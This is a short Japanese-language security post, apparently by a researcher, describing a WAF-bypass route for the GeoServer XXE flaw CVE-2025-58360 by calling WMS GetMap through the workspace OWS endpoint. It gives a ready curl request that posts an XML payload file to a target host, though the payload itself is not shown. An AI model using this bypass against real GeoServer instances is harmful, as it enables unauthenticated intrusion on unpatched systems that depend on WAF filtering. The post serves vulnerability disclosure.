
CVE-2025-58360を悪用してWAFをバイパスする新しい方法
GeoServer分析中に、WMS GetMap操作を介して認証されていないXML外部エンティティ(XXE)を攻撃する別の方法を発見しました。この脆弱性は、下記に示すように、/geoserver/wmsからWMSサービスを直接呼び出す代わりに、OWS呼び出しを使用して/geoserver/{workspaces}/ows経由でWMSサービスを呼び出すことで利用できます。
curl -X POST "http://IP:PORT/geoserver/topp/ows?service=WMS&version=2.0.0&request=getmap&maxFeatures=1&outputFormat=application%2Fjson" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png
この脆弱性はCVE-2025-58360ですが、攻撃者に攻撃バイパスを提供します。WAFシステムをバイパスし、geoserverを使用するユーザーを標的にできます(ユーザーがバージョンを更新できず、悪意のあるリクエストを遮断するためにWAFのみを使用している場合があるため)
